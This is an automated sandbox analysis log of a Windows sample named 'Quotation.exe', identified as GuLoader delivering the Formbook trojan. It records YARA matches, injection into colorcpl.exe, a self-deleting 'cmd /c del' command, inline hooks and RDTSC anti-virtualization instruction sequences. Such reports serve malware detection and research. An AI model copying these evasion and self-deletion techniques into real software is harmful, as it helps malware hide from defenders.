      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E52FC83_2_33E52FC8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1FFB13_2_33F1FFB1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61F923_2_33E61F92
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED4F403_2_33ED4F40
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA2F283_2_33EA2F28
      Source: C:\Windows\explorer.exeCode function: 5_2_0B1412325_2_0B141232
      Source: C:\Windows\explorer.exeCode function: 5_2_0B13E9125_2_0B13E912
      Source: C:\Windows\explorer.exeCode function: 5_2_0B138D025_2_0B138D02
      Source: C:\Windows\explorer.exeCode function: 5_2_0B13BB325_2_0B13BB32
      Source: C:\Windows\explorer.exeCode function: 5_2_0B13BB305_2_0B13BB30
      Source: C:\Windows\explorer.exeCode function: 5_2_0B1445CD5_2_0B1445CD
      Source: C:\Windows\explorer.exeCode function: 5_2_0B1400365_2_0B140036
      Source: C:\Windows\explorer.exeCode function: 5_2_0B1370825_2_0B137082
      Source: C:\Windows\explorer.exeCode function: 5_2_10F230825_2_10F23082
      Source: C:\Windows\explorer.exeCode function: 5_2_10F2C0365_2_10F2C036
      Source: C:\Windows\explorer.exeCode function: 5_2_10F305CD5_2_10F305CD
      Source: C:\Windows\explorer.exeCode function: 5_2_10F2A9125_2_10F2A912
      Source: C:\Windows\explorer.exeCode function: 5_2_10F24D025_2_10F24D02
      Source: C:\Windows\explorer.exeCode function: 5_2_10F2D2325_2_10F2D232
      Source: C:\Windows\explorer.exeCode function: 5_2_10F27B325_2_10F27B32
      Source: C:\Windows\explorer.exeCode function: 5_2_10F27B305_2_10F27B30
      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 33EDF290 appears 66 times
      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 33EA7E54 appears 76 times
      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 33E4B970 appears 196 times
      Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 33ECEA12 appears 65 times
      Source: Quotation.exeStatic PE information: invalid certificate
      Source: Quotation.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: Quotation.exe, 00000003.00000003.2515303655.0000000033BE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
      Source: Quotation.exe, 00000003.00000002.2614695348.0000000033C73000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs Quotation.exe
      Source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs Quotation.exe
      Source: Quotation.exe, 00000003.00000003.2517704817.0000000033D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
      Source: Quotation.exe, 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
      Source: Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs Quotation.exe
      Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: Quotation.exe PID: 3288, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: colorcpl.exe PID: 2284, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.troj.evad.winEXE@8/9@2/1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00404991 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404991
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021AF
      Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\ethnocentrismJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
      Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsy2838.tmpJump to behavior
      Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Quotation.exeVirustotal: Detection: 16%
      Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quotation.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: fontext.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: fms.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msxml3.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: colorcpl.pdbGCTL source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614695348.0000000033C70000.00000040.10000000.00040000.00000000.sdmp, Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3257653081.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: colorcpl.pdb source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614695348.0000000033C70000.00000040.10000000.00040000.00000000.sdmp, Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3257653081.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2515303655.0000000033AC1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2517704817.0000000033C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2570205153.0000000004A69000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2567985473.00000000048BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2515303655.0000000033AC1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2517704817.0000000033C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2570205153.0000000004A69000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2567985473.00000000048BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.2396223937.0000000006CC9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73421BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73421BFF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_734230C0 push eax; ret 0_2_734230EE
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E509AD push ecx; mov dword ptr [esp], ecx3_2_33E509B6
      Source: C:\Windows\explorer.exeCode function: 5_2_0B144B1E push esp; retn 0000h5_2_0B144B1F
      Source: C:\Windows\explorer.exeCode function: 5_2_0B144B02 push esp; retn 0000h5_2_0B144B03
      Source: C:\Windows\explorer.exeCode function: 5_2_0B1449B5 push esp; retn 0000h5_2_0B144AE7
      Source: C:\Windows\explorer.exeCode function: 5_2_10F309B5 push esp; retn 0000h5_2_10F30AE7
      Source: C:\Windows\explorer.exeCode function: 5_2_10F30B1E push esp; retn 0000h5_2_10F30B1F
      Source: C:\Windows\explorer.exeCode function: 5_2_10F30B02 push esp; retn 0000h5_2_10F30B03
      Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEA
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 75C022C
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 352022C
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 7572A4F second address: 7572A4F instructions: 0x00000000 rdtsc 0x00000002 cmp ax, 00009D51h 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F0431126F2Fh 0x0000000a test bh, 00000067h 0x0000000d inc ebp 0x0000000e cmp dh, ch 0x00000010 inc ebx 0x00000011 test ebx, ecx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 34D2A4F second address: 34D2A4F instructions: 0x00000000 rdtsc 0x00000002 cmp ax, 00009D51h 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F04310E472Fh 0x0000000a test bh, 00000067h 0x0000000d inc ebp 0x0000000e cmp dh, ch 0x00000010 inc ebx 0x00000011 test ebx, ecx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: AC9904 second address: AC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: AC9B6E second address: AC9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD1C0 rdtsc 3_2_33ECD1C0
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 891Jump to behavior
